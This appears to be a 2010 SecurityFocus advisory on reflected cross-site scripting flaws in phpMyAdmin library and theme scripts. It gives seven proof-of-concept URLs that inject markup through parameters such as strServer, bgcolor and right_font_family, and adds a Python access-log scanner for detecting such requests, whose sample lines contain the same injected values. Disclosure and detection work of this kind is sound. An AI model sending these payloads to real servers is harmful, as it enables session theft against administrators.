PHPMyAdmin Multiple Libraries And Themes Remote Cross-Site Scripting Vulnerabilities

No exploit is required to leverage any of these issues. The following proof-of-concept URLs have been provided:

http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
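
For detection, the following added example (not part of the original advisory) scans web access-log lines for direct requests to the scripts listed above that carry request-supplied cfg[...] values or markup characters in the listed parameters. The log lines are constructed samples, and the function names findings and scan are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter names taken from the URLs listed in the advisory.
SCRIPTS = ("/libraries/select_server.lib.php", "/libraries/display_tbl_links.lib.php",
           "/css/theme_left.css.php", "/css/theme_right.css.php")
REFLECTED = {"strServer", "strServerChoice", "cfg[BgcolorOne]", "bgcolor",
             "row_no", "left_font_family", "right_font_family"}
MARKUP = re.compile(r'[<>"\']')
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def findings(target):
    """Return the reasons a request target matches the advisory's pattern."""
    parts = urlsplit(target)
    if not parts.path.endswith(SCRIPTS):
        return []
    reasons = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.startswith("cfg["):
            reasons.append("config value supplied in request: " + name)
        if name in REFLECTED and MARKUP.search(value):
            reasons.append("markup characters in " + name)
    return reasons


def scan(lines):
    """Yield (line_number, reasons) for each flagged access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = findings(match.group(1)) if match else []
        if reasons:
            yield number, reasons


# Constructed sample log lines (not from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /phpMyAdmin/index.php?db=test HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&row_no=%22%3E%3Cb%3E HTTP/1.1" 200 310',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][a]=x&strServerChoice=%3CH1%3Etest HTTP/1.1" 200 290',
    '192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=Arial HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, "; ".join(reasons))
```
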


 

Copyright 2010, SecurityFocus